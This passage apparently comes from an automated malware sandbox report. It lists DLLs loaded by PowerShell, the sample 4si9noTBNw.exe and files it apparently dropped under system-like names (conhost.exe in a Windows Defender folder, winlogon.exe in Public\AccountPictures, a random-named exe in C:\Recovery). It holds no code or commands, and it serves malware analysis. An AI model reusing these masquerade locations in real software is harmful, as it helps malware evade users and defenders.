                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: version.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: wldp.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: version.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: wldp.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: sspicli.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: mscoree.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: apphelp.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: version.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: wldp.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: profapi.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: sspicli.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: mscoree.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: version.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: wldp.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: profapi.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: mscoree.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: apphelp.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: kernel.appcore.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: version.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: uxtheme.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: windows.storage.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: wldp.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: profapi.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: cryptsp.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: rsaenh.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: cryptbase.dll
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeSection loaded: sspicli.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: mscoree.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: version.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: wldp.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: profapi.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: sspicli.dll
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: mscoree.dll
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: version.dll
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: uxtheme.dll
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: windows.storage.dll
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: wldp.dll
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: profapi.dll
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: cryptsp.dll
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: rsaenh.dll
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: cryptbase.dll
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: sspicli.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: mscoree.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: version.dll
